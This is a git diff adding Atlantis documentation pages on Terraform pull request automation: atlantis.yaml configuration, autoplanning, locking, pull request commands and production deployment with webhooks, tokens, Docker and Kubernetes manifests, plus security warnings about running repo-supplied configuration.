+* [Autoplanning](autoplanning.html) - how Atlantis runs plan automatically.
+* [`atlantis.yaml` Reference](atlantis-yaml-reference) - reference docs for the `atlantis.yaml` configuration file.
+* [Security](security.html) - what you need to think about in terms of security for Atlantis.
+* [FAQ](faq.html) - Frequently asked questions.
+
+
+
+
+
+
diff --git a/runatlantis.io/docs/apply-requirements.md b/runatlantis.io/docs/apply-requirements.md
new file mode 100644
index 0000000000..8f409a6439
--- /dev/null
+++ b/runatlantis.io/docs/apply-requirements.md
@@ -0,0 +1,22 @@
+# Apply Requirements
+
+## Approved
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required. If you want to configure this on a per-repo/project basis, for example to only require approvals for your production
+configuration you must use an `atlantis.yaml` file:
+```yaml
+version: 2
+projects:
+- dir: .
+ apply_requirements: [approved]
+```
+
+::: danger
+Please be aware that in GitHub **any user with read permissions** can approve a pull request.
+
+In GitLab, you [can set](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html#editing-approvals) who is allowed to approve.
+:::
+
+## Next Steps
+* For more information on GitHub pull request reviews and approvals see: [https://help.github.com/articles/about-pull-request-reviews/](https://help.github.com/articles/about-pull-request-reviews/)
+* For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: [https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html](https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html).
\ No newline at end of file
diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
new file mode 100644
index 0000000000..a2fbe21755
--- /dev/null
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -0,0 +1,184 @@
+# atlantis.yaml Reference
+[[toc]]
+
+::: tip Do I need an atlantis.yaml file?
+`atlantis.yaml` files are only required if you wish to customize some aspect of Atlantis.
+:::
+
+::: tip Where are the example use cases?
+See [www.runatlantis.io/guide/atlantis-yaml-use-cases.html](../guide/atlantis-yaml-use-cases.html)
+:::
+
+## Enabling atlantis.yaml
+The atlantis server must be running with `--allow-repo-config` to allow Atlantis
+to use `atlantis.yaml` files.
+
+## Example Using All Keys
+```yaml
+version: 2
+projects:
+- name: my-project-name
+ dir: .
+ workspace: default
+ terraform_version: v0.11.0
+ autoplan:
+ when_modified: ["*.tf", "../modules/**.tf"]
+ enabled: true
+ apply_requirements: [approved]
+ workflow: myworkflow
+workflows:
+ myworkflow:
+ plan:
+ steps:
+ - run: my-custom-command arg1 arg2
+ - init
+ - plan:
+ extra_args: ["-lock", "false"]
+ - run: my-custom-command arg1 arg2
+ apply:
+ steps:
+ - run: echo hi
+ - apply
+```
+
+## Usage Notes
+* `atlantis.yaml` files must be placed at the root of the repo
+* The only supported name is `atlantis.yaml`. Not `atlantis.yml` or `.atlantis.yaml`.
+* Once an `atlantis.yaml` file exists in a repo Atlantis will not automatically plan
+any other projects. This means if you have multiple projects in the same repo, once
+you add an `atlantis.yaml` you'll need to add entries for each project.
+* Atlantis uses the `atlantis.yaml` version from the pull request.
+
+## Security
+`atlantis.yaml` files allow users to run arbitrary code on the Atlantis server.
+This is obviously extremely powerful and dangerous since the Atlantis server will
+likely hold your highest privilege credentials.
+
+The risk is increased because Atlantis uses the `atlantis.yaml` file from the
+pull request so anyone that can submit a pull request can submit a malicious file.
+
+As such, **`atlantis.yaml` files should only be enabled in a trusted environment**.
+
+::: danger
+It should be noted that `atlantis apply` itself could be exploited if run on a malicious file. See [Security](security.html#exploits).
+:::
+
+## Reference
+### Top-Level Keys
+```yaml
+version:
+projects:
+workflows:
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| version | int | none | yes | This key is required and must be set to `2`|
+| projects | array[[Project](atlantis-yaml-reference.html#project)] | [] | no | Lists the projects in this repo |
+| workflows | map[string -> [Workflow](atlantis-yaml-reference.html#workflow)] | {} | no | Custom workflows |
+
+### Project
+```yaml
+name: myname
+dir: mydir
+workspace: myworkspace
+autoplan:
+terraform_version: 0.11.0
+apply_requirements: ["approved"]
+workflow: myworkflow
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| name | string | none | maybe | Required if there is more than one project with the same `dir` and `workspace`. This project name can be used with the `-p` flag.|
+| dir | string | none | yes | The directory of this project relative to the repo root. Use `.` for the root. For example if the project was under `./project1` then use `project1`|
+| workspace | string| default | no | The [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) for this project. Atlantis will switch to this workplace when planning/applying and will create it if it doesn't exist.|
+| autoplan | [Autoplan](atlantis-yaml-reference.html#autoplan) | none | no | A custom autoplan configuration. If not specified, will use the default algorithm. See [Autoplanning](autoplanning.html).|
+| terraform_version | string | none | no | A specific Terraform version to use when running commands for this project. Requires there to be a binary in the Atlantis `PATH` with the name `terraform{VERSION}`, ex. `terraform0.11.0`|
+| apply_requirements | array[string] | [] | no | Requirements that must be satisfied before `atlantis apply` can be run. Currently the only supported requirement is `approved`. See [Apply Requirements](apply-requirements.html#approved) for more details.|
+| workflow | string | none | no | A custom workflow. If not specified, Atlantis will use its default workflow.|
+
+::: tip
+A project represents a Terraform state. Typically, there is one state per directory and workspace however it's possible to
+have multiple states in the same directory using `terraform init -backend-config=custom-config.tfvars`.
+Atlantis supports this but requires the `name` key to be specified. See [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html#custom-backend-config) for more details.
+:::
+
+### Autoplan
+```yaml
+enabled: true
+when_modified: ["*.tf"]
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| enabled | boolean | true | no | Whether autoplanning is enabled for this project. |
+| when_modified | array[string] | no | no | Uses [.dockerignore](https://docs.docker.com/engine/reference/builder/#dockerignore-file) syntax. If any modified file in the pull request matches, this project will be planned. If not specified, Atlantis will use its own algorithm. See [Autoplanning](autoplanning.html). Paths are relative to the project's dir.|
+
+### Workflow
+```yaml
+plan:
+apply:
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| plan | [Stage](atlantis-yaml-reference.html#stage) | `steps: [init, plan]` | no | How to plan for this project. |
+| apply | [Stage](atlantis-yaml-reference.html#stage) | `steps: [apply]` | no | How to apply for this project. |
+
+### Stage
+```yaml
+steps:
+- run: custom-command
+- init
+- plan:
+ extra_args: [-lock=false]
+```
+
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| steps | array[[Step](atlantis-yaml-reference.html#step)] | `[]` | no | List of steps for this stage. If the steps key is empty, no steps will be run for this stage. |
+
+### Step
+#### Built-In Command
+Steps can be a single string for a built-in command.
+```yaml
+- init
+- plan
+- apply
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply | string | none | no | Use a built-in command without additional configuration. Only `init`, `plan` and `apply` are supported||
+
+#### Built-In Command With Extra Args
+A map from string to `extra_args` for a built-in command with extra arguments.
+```yaml
+- init:
+ extra_args: [arg1, arg2]
+- plan:
+ extra_args: [arg1, arg2]
+- apply:
+ extra_args: [arg1, arg2]
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| init/plan/apply | map[`extra_args` -> array[string]] | none | no | Use a built-in command and append `extra_args`. Only `init`, `plan` and `apply` are supported as keys and only `extra_args` is supported as a value||
+#### Custom Command
+Or a custom command
+```yaml
+- run: custom-command
+```
+| Key | Type | Default | Required | Description |
+| -------------| --- |-------------| -----|---|
+| run | string| none | no | Run a custom command|
+
+::: tip
+`run` steps are executed with the following environment variables:
+* `WORKSPACE` - The Terraform workspace used for this project, ex. `default`.
+ * NOTE: if the step is executed before `init` then Atlantis won't have switched to this workspace yet.
+* `ATLANTIS_TERRAFORM_VERSION` - The version of Terraform used for this project, ex. `0.11.0`.
+* `DIR` - Absolute path to the current directory.
+:::
+
+## Next Steps
+Check out the [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html) for
+some real world examples.
diff --git a/runatlantis.io/docs/autoplanning.md b/runatlantis.io/docs/autoplanning.md
new file mode 100644
index 0000000000..8260ed98b2
--- /dev/null
+++ b/runatlantis.io/docs/autoplanning.md
@@ -0,0 +1,39 @@
+# Autoplanning
+On any **new** pull request or **new commit** to an existing pull request, Atlantis will attempt to
+run `terraform plan` in the directories it thinks hold modified Terraform projects.
+
+The algorithm it uses is as follows:
+1. Get list of all modified files in pull request
+1. Filter to those containing `.tf`
+1. Get the directories that those files are in
+1. If the directory path doesn't contain `modules/` then try to run `plan` in that directory
+1. If it does contain `modules/` look at the directory one level above `modules/`. If it
+contains a `main.tf` run plan in that directory, otherwise ignore the change.
+
+## Example
+Given the directory structure:
+```
+.
+├── modules
+│ └── module1
+│ └── main.tf
+└── project1
+ ├── main.tf
+ └── modules
+ └── module1
+ └── main.tf
+```
+
+* If `project1/main.tf` were modified, we would run `plan` in `project1`
+* If `modules/module1/main.tf` were modified, we would not automatically run `plan` because we couldn't determine the location of the terraform project
+ * You could use an [atlantis.yaml](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning) file to specify which projects to plan when this module changed
+ * Or you could manually plan with `atlantis plan -d
`
+* If `project1/modules/module1/main.tf` were modified, we would look one level above `project1/modules`
+into `project1/`, see that there was a `main.tf` file and so run plan in `project1/`
+
+## Customizing
+If you would like to customize how Atlantis determines which directory to run in
+or disable it all together you need to create an `atlantis.yaml` file.
+See
+* [Disabling Autoplanning](../guide/atlantis-yaml-use-cases.html#disabling-autoplanning)
+* [Configuring Autoplanning](../guide/atlantis-yaml-use-cases.html#configuring-autoplanning)
diff --git a/runatlantis.io/docs/deployment.md b/runatlantis.io/docs/deployment.md
new file mode 100644
index 0000000000..d40dcb91c5
--- /dev/null
+++ b/runatlantis.io/docs/deployment.md
@@ -0,0 +1,386 @@
+# Production-Ready Deployment
+[[toc]]
+## Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from https://www.terraform.io/downloads.html
+```bash
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+Check that it's in your `$PATH`
+```
+$ terraform version
+Terraform v0.10.0
+```
+If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions)
+
+## Hosting Atlantis
+Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks.
+
+By default Atlantis runs on port `4141`. This can be changed with the `--port` flag.
+
+## Add GitHub Webhook
+Once you've decided where to host Atlantis you can add it as a Webhook to GitHub.
+If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work.
+
+::: tip
+If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/
+:::
+
+If you're installing on the organization, navigate to your organization's page and click **Settings**.
+If installing on a single repository, navigate to the repository home page and click **Settings**.
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Content type** to `application/json`
+- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` flag when you start Atlantis
+- select **Let me select individual events**
+- check the boxes
+ - **Pull request reviews**
+ - **Pushes**
+ - **Issue comments**
+ - **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+## Add GitLab Webhook
+If you're using GitLab, navigate to your project's home page in GitLab
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Secret Token** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gitlab-webhook-secret` flag when you start Atlantis
+- check the boxes
+ - **Push events**
+ - **Comments**
+ - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+## Create a GitHub Token
+We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user.
+
+**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:**
+![Atlantis status](./images/status.png)
+
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- copy the access token
+
+## Create a GitLab Token
+We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user.
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- copy the access token
+
+## Start Atlantis
+Now you're ready to start Atlantis!
+
+If you're using GitHub, run:
+```
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+```
+
+If you're using GitHub Enterprise, run:
+```
+HOSTNAME=YOUR_GITHUB_ENTERPRISE_HOSTNAME # ex. github.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $HOSTNAME
+```
+
+If you're using GitLab, run:
+```
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+```
+
+If you're using GitLab Enterprise, run:
+```
+HOSTNAME=YOUR_GITLAB_ENTERPRISE_HOSTNAME # ex. gitlab.runatlantis.io, without the scheme
+atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET --gitlab-hostname $HOSTNAME
+```
+
+- `$URL` is the URL that Atlantis can be reached at
+- `$USERNAME` is the GitHub/GitLab username you generated the token for
+- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
+- `$SECRET` is the random key you used for the webhook secret. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+
+Atlantis is now running!
+**We recommend running it under something like Systemd or Supervisord.**
+
+## Docker
+Atlantis also ships inside a docker image. Run the docker image:
+
+```bash
+docker run runatlantis/atlantis:latest server
+```
+
+### Usage
+If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this:
+
+* Create a custom docker file
+```bash
+vim Dockerfile-custom
+```
+
+```dockerfile
+FROM runatlantis/atlantis
+
+# copy a terraform binary of the version you need
+COPY terraform /usr/local/bin/terraform
+```
+
+* Build docker image
+
+```bash
+docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom .
+```
+
+* Run docker image
+
+```bash
+docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN
+```
+
+## Kubernetes
+Atlantis can be deployed into Kubernetes as a
+[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage.
+
+StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies
+or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that
+Atlantis has right now is any plans that haven't been applied and Atlantis locks. If
+Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world.
+
+Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token:
+```
+echo -n "yourtoken" > token
+echo -n "yoursecret" > webhook-secret
+kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret
+```
+
+Next, edit the manifests below as follows:
+1. Replace `` in `image: runatlantis/atlantis:` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest.
+ * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end
+up upgrading Atlantis by accident!
+2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern
+for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details.
+3. If you're using GitHub:
+ 1. Replace `` with the username of your Atlantis GitHub user without the `@`.
+ 2. Delete all the `ATLANTIS_GITLAB_*` environment variables.
+4. If you're using GitLab:
+ 1. Replace `` with the username of your Atlantis GitLab user without the `@`.
+ 2. Delete all the `ATLANTIS_GH_*` environment variables.
+
+### StatefulSet Manifest
+
+ Show...
+
+```yaml
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+ name: atlantis
+spec:
+ serviceName: atlantis
+ replicas: 1
+ updateStrategy:
+ type: RollingUpdate
+ rollingUpdate:
+ partition: 0
+ selector:
+ matchLabels:
+ app: atlantis
+ template:
+ metadata:
+ labels:
+ app: atlantis
+ spec:
+ securityContext:
+ fsGroup: 1000 # Atlantis group (1000) read/write access to volumes.
+ containers:
+ - name: atlantis
+ image: runatlantis/atlantis:v # 1. Replace with the most recent release.
+ env:
+ - name: ATLANTIS_REPO_WHITELIST
+ value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+ ## GitHub Config ###
+ - name: ATLANTIS_GH_USER
+ value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`.
+ - name: ATLANTIS_GH_TOKEN
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: token
+ - name: ATLANTIS_GH_WEBHOOK_SECRET
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: webhook-secret
+
+ ## GitLab Config ###
+ - name: ATLANTIS_GITLAB_USER
+ value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`.
+ - name: ATLANTIS_GITLAB_TOKEN
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: token
+ - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: webhook-secret
+
+ - name: ATLANTIS_DATA_DIR
+ value: /atlantis
+ - name: ATLANTIS_PORT
+ value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+ volumeMounts:
+ - name: atlantis-data
+ mountPath: /atlantis
+ ports:
+ - name: atlantis
+ containerPort: 4141
+ resources:
+ requests:
+ memory: 256Mi
+ cpu: 100m
+ limits:
+ memory: 256Mi
+ cpu: 100m
+ volumeClaimTemplates:
+ - metadata:
+ name: atlantis-data
+ spec:
+ accessModes: ["ReadWriteOnce"] # Volume should not be shared by multiple nodes.
+ resources:
+ requests:
+ # The biggest thing Atlantis stores is the Git repo when it checks it out.
+ # It deletes the repo after the pull request is merged.
+ storage: 5Gi
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: atlantis
+spec:
+ ports:
+ - name: atlantis
+ port: 80
+ targetPort: 4141
+ selector:
+ app: atlantis
+```
+
+
+
+### Deployment Manifest
+
+ Show...
+
+```yaml
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: atlantis
+ labels:
+ app: atlantis
+spec:
+ replicas: 1
+ selector:
+ matchLabels:
+ app: atlantis
+ template:
+ metadata:
+ labels:
+ app: atlantis
+ spec:
+ containers:
+ - name: atlantis
+ image: runatlantis/atlantis:v # 1. Replace with the most recent release.
+ env:
+ - name: ATLANTIS_REPO_WHITELIST
+ value: github.com/yourorg/* # 2. Replace this with your own repo whitelist.
+
+ ## GitHub Config ###
+ - name: ATLANTIS_GH_USER
+ value: # 3i. If you're using GitHub replace with the username of your Atlantis GitHub user without the `@`.
+ - name: ATLANTIS_GH_TOKEN
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: token
+ - name: ATLANTIS_GH_WEBHOOK_SECRET
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: webhook-secret
+
+ ## GitLab Config ###
+ - name: ATLANTIS_GITLAB_USER
+ value: # 4i. If you're using GitLab replace with the username of your Atlantis GitLab user without the `@`.
+ - name: ATLANTIS_GITLAB_TOKEN
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: token
+ - name: ATLANTIS_GITLAB_WEBHOOK_SECRET
+ valueFrom:
+ secretKeyRef:
+ name: atlantis-vcs
+ key: webhook-secret
+ - name: ATLANTIS_PORT
+ value: "4141" # Kubernetes sets an ATLANTIS_PORT variable so we need to override.
+ ports:
+ - name: atlantis
+ containerPort: 4141
+ resources:
+ requests:
+ memory: 256Mi
+ cpu: 100m
+ limits:
+ memory: 256Mi
+ cpu: 100m
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: atlantis
+spec:
+ ports:
+ - name: atlantis
+ port: 80
+ targetPort: 4141
+ selector:
+ app: atlantis
+```
+
+
+### Routing and SSL
+The manifests above create a Kubernetes `Service` of type `ClusterIP` which isn't accessible outside your cluster.
+Depending on how you're doing routing into Kubernetes, you may want to use a `LoadBalancer` so that Atlantis is accessible
+to GitHub/GitLab and your internal users.
+
+If you want to add SSL you can use something like https://github.com/jetstack/cert-manager to generate SSL
+certs and mount them into the Pod. Then set the `ATLANTIS_SSL_CERT_FILE` and `ATLANTIS_SSL_KEY_FILE` environment variables to enable SSL.
+You could also set up SSL at your LoadBalancer.
+
+## AWS Fargate
+
+If you'd like to run Atlantis on [AWS Fargate](https://aws.amazon.com/fargate/) check out the Atlantis module on the Terraform Module Registry: https://registry.terraform.io/modules/terraform-aws-modules/atlantis/aws
+
+## Testing Out Atlantis on GitHub
+
+If you'd like to test out Atlantis before running it on your own repositories you can fork our example repo.
+
+- Fork https://github.com/runatlantis/atlantis-example
+- If you didn't add the Webhook as to your organization add Atlantis as a Webhook to the forked repo (see [Add GitHub Webhook](#add-github-webhook))
+- Now that Atlantis can receive events you should be able to comment on a pull request to trigger Atlantis. Create a pull request
+ - Click **Branches** on your forked repo's homepage
+ - click the **New pull request** button next to the `example` branch
+ - Change the `base` to `{your-repo}/master`
+ - click **Create pull request**
+- Now you can test out Atlantis
+ - Create a comment `atlantis help` to see what commands you can run from the pull request
+ - `atlantis plan` will run `terraform plan` behind the scenes. You should see the output commented back on the pull request. You should also see some logs show up where you're running `atlantis server`
+ - `atlantis apply` will run `terraform apply`. Since our pull request creates a `null_resource` (which does nothing) this is safe to do.
+
+
diff --git a/runatlantis.io/docs/faq.md b/runatlantis.io/docs/faq.md
new file mode 100644
index 0000000000..379bd74e99
--- /dev/null
+++ b/runatlantis.io/docs/faq.md
@@ -0,0 +1,28 @@
+# FAQ
+**Q: Does Atlantis affect Terraform [remote state](https://www.terraform.io/docs/state/remote.html)?**
+
+A: No. Atlantis does not interfere with Terraform remote state in any way. Under the hood, Atlantis is simply executing `terraform plan` and `terraform apply`.
+
+**Q: How does Atlantis locking interact with Terraform [locking](https://www.terraform.io/docs/state/locking.html)?**
+
+A: Atlantis provides locking of pull requests that prevents concurrent modification of the same infrastructure (Terraform project) whereas Terraform locking only prevents two concurrent `terraform apply`'s from happening.
+
+Terraform locking can be used alongside Atlantis locking since Atlantis is simply executing terraform commands.
+
+**Q: How to run Atlantis in high availability mode? Does it need to be?**
+
+A: Atlantis server can easily be run under the supervision of a init system like `upstart` or `systemd` to make sure `atlantis server` is always running.
+
+Atlantis currently stores all locking and Terraform plans locally on disk under the `--data-dir` directory (defaults to `~/.atlantis`). Because of this there is currently no way to run two or more Atlantis instances concurrently.
+
+However, if you were to lose the data, all you would need to do is run `atlantis plan` again on the pull requests that are open. If someone tries to run `atlantis apply` after the data has been lost then they will get an error back, so they will have to re-plan anyway.
+
+**Q: How to add SSL to Atlantis server?**
+
+A: First, you'll need to get a public/private key pair to serve over SSL.
+These need to be in a directory accessible by Atlantis. Then start `atlantis server` with the `--ssl-cert-file` and `--ssl-key-file` flags.
+See `atlantis server --help` for more information.
+
+**Q: How can I get Atlantis up and running on AWS?**
+
+A: There is [terraform-aws-atlantis](https://github.com/terraform-aws-modules/terraform-aws-atlantis) project where complete Terraform configurations for running Atlantis on AWS Fargate are hosted. Tested and maintained.
\ No newline at end of file
diff --git a/runatlantis.io/docs/images/lock-comment.png b/runatlantis.io/docs/images/lock-comment.png
new file mode 100644
index 0000000000..a7c2a8f506
Binary files /dev/null and b/runatlantis.io/docs/images/lock-comment.png differ
diff --git a/runatlantis.io/docs/images/lock-delete-comment.png b/runatlantis.io/docs/images/lock-delete-comment.png
new file mode 100644
index 0000000000..db452bf568
Binary files /dev/null and b/runatlantis.io/docs/images/lock-delete-comment.png differ
diff --git a/runatlantis.io/docs/images/lock-detail-ui.png b/runatlantis.io/docs/images/lock-detail-ui.png
new file mode 100644
index 0000000000..942c790710
Binary files /dev/null and b/runatlantis.io/docs/images/lock-detail-ui.png differ
diff --git a/runatlantis.io/docs/images/locks-ui.png b/runatlantis.io/docs/images/locks-ui.png
new file mode 100644
index 0000000000..ef25124c9d
Binary files /dev/null and b/runatlantis.io/docs/images/locks-ui.png differ
diff --git a/docs/pr-comment-apply.png b/runatlantis.io/docs/images/pr-comment-apply.png
similarity index 100%
rename from docs/pr-comment-apply.png
rename to runatlantis.io/docs/images/pr-comment-apply.png
diff --git a/docs/pr-comment-help.png b/runatlantis.io/docs/images/pr-comment-help.png
similarity index 100%
rename from docs/pr-comment-help.png
rename to runatlantis.io/docs/images/pr-comment-help.png
diff --git a/docs/pr-comment-plan.png b/runatlantis.io/docs/images/pr-comment-plan.png
similarity index 100%
rename from docs/pr-comment-plan.png
rename to runatlantis.io/docs/images/pr-comment-plan.png
diff --git a/docs/status.png b/runatlantis.io/docs/images/status.png
similarity index 100%
rename from docs/status.png
rename to runatlantis.io/docs/images/status.png
diff --git a/runatlantis.io/docs/locking.md b/runatlantis.io/docs/locking.md
new file mode 100644
index 0000000000..55615c76af
--- /dev/null
+++ b/runatlantis.io/docs/locking.md
@@ -0,0 +1,66 @@
+# Locking
+When `plan` is run, the directory and Terraform workspace are **Locked** until the pull request merged or the plan is manually deleted.
+
+If another user attempts to `plan` for the same directory and workspace in a different pull request
+they'll see this error:
+
+![Lock Comment](./images/lock-comment.png)
+
+Which links them to the pull request that holds the lock.
+
+::: warning NOTE
+Only the directory in the repo and Terraform workspace are locked, not the whole repo.
+:::
+
+[[toc]]
+
+## Why
+1. Because `atlantis apply` is being done before the pull request is merged, after
+an apply your `master` branch does not represent the most up to date version of your infrastructure
+anymore. With locking, you can ensure that no other changes will be made until the
+pull request is merged.
+
+::: tip Why not apply on merge?
+Sometimes `terraform apply` fails. If the apply were to fail after the pull
+request was merged, you would need to create a new pull request to fix it.
+With locking + applying on the branch, you effectively mimic merging to master
+but with the added ability to re-plan/apply multiple times if things don't work.
+:::
+2. If there is already a `plan` in progress, other users won't see a plan that
+will be made invalid after the in-progress plan is applied.
+
+## Viewing Locks
+To view locks, go to the URL that Atlantis is hosted at:
+
+![Locks View](./images/locks-ui.png)
+
+You can click on a lock to view its details:
+
+
+
+
+
+## Unlocking
+To unlock the project and workspace without completing an `apply` and merging, click the link
+at the bottom of the plan comment to discard the plan and delete the lock where
+it says **"To discard this plan click here"**:
+
+![Locks View](./images/lock-delete-comment.png)
+
+The link will take you to the lock detail view where you can click **Discard Plan and Unlock**
+to delete the lock.
+
+
+
+
+
+Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
+
+## Relationship to Terraform State Locking
+Atlantis does not conflict with [Terraform State Locking](https://www.terraform.io/docs/state/locking.html). Under the hood, all
+Atlantis is doing is running `terraform plan` and `apply` and so all of the
+locking built in to those commands by Terraform isn't affected.
+
+In more detail, Terraform state locking locks the state while you run `terraform apply`
+so that multiple apply's can't run concurrently. Atlantis's locking is at a higher
+level because it prevents multiple pull requests from working on the same state.
diff --git a/runatlantis.io/docs/pull-request-commands.md b/runatlantis.io/docs/pull-request-commands.md
new file mode 100644
index 0000000000..94dc8260f3
--- /dev/null
+++ b/runatlantis.io/docs/pull-request-commands.md
@@ -0,0 +1,57 @@
+# Pull Request Commands
+Atlantis currently supports three commands that can be run via pull request comments:
+[[toc]]
+
+## atlantis help
+![Help Command](./images/pr-comment-help.png)
+```bash
+atlantis help
+```
+**Explanation**: View help
+
+---
+## atlantis plan
+![Plan Command](./images/pr-comment-plan.png)
+```bash
+atlantis plan [options] -- [terraform plan flags]
+```
+**Explanation**: Runs `terraform plan` on the pull request's branch. You may wish to re-run plan after Atlantis has already done
+so if you've changed some resources manually.
+
+Options:
+* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. Defaults to root.
+ * Ex. `atlantis plan -d child/dir`
+* `-p project` Which project to run plan for. Refers to the name of the project configured in the repo's [`atlantis.yaml` file](/docs/atlantis-yaml-reference.html). Cannot be used at same time as `-d` or `-w` because the project defines this already.
+* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'` or `-var-file myfile.tfvars`
+you can append them to the end of the comment after `--`, ex.
+```
+atlantis plan -d dir -- -var 'foo=bar'
+```
+If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
+
+---
+## atlantis apply
+![Apply Command](./images/pr-comment-apply.png)
+```bash
+atlantis apply [options] -- [terraform apply flags]
+```
+**Explanation**: Runs `terraform apply` for the plan generated previously that matches the directory/project/workspace.
+
+Options:
+* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. Defaults to root.
